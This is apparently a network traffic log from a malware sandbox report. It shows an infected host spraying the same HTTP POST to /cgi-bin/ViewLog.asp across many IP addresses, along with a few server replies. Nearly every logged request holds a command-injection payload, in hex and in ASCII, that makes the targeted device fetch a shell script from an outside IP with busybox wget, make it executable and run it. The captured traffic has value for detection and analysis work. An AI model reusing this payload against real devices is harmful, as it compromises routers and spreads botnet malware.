                                                            Feb 14, 2024 09:29:38.485572100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.439937115 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            468192.168.2.233642631.132.40.338080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:57.974975109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:58.195003033 CET301INHTTP/1.0 302 Found
                                                            Pragma: no-cache
                                                            Location: https://192.168.0.14:4443/cgi-bin/ViewLog.asp
                                                            Content-type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 33 30 32 20 44 6f 63 75 6d 65 6e 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 31 39 32 2e 31 36 38 2e 30 2e 31 34 3a 34 34 34 33 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 50 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html> <head> <title>302 Document moved</title> </head><body>This document has moved <A HREF="https://192.168.0.14:4443/cgi-bin/ViewLog.asp">here</A>.<P></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            469192.168.2.233978862.87.204.768080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:57.994066954 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:58.230197906 CET506INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 341
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 08:28:57 GMT
                                                            Server: lighttpd/1.4.54
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            470192.168.2.234878894.122.16.258080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:58.006367922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            471192.168.2.233666462.29.84.248080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:58.006438971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            472192.168.2.233773631.128.213.728080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:58.008414984 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:58.261953115 CET421INHTTP/1.1 200 OK
                                                            Content-Security-Policy: default-src *; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; frame-ancestors 'self'
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            X-Content-Type-Options: nosniff
                                                            Date: Wed, 14 Feb 2024 08:28:58 GMT
                                                            Etag: "5c936401.2096"
                                                            Content-Type: text/html
                                                            Content-Length: 2096
                                                            Connection: close
                                                            Accept-Ranges: bytes


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            473192.168.2.235990831.136.57.1688080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:58.179953098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:58.875145912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:00.218940020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:02.906594038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:08.281878948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:19.032290936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:40.533286095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:23.535479069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            474192.168.2.235948094.111.54.2528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:58.189759016 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            475192.168.2.235084294.19.243.308080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:58.228581905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:58.463223934 CET536INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:48 GMT
                                                            Server:
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            476192.168.2.235073494.121.123.618080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:58.253176928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            477192.168.2.234670494.122.83.1928080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:58.253279924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            478192.168.2.234004462.29.35.2088080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:58.256206036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:59.547019958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:01.082869053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:04.186486959 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:10.329500914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:22.615773916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.724292994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
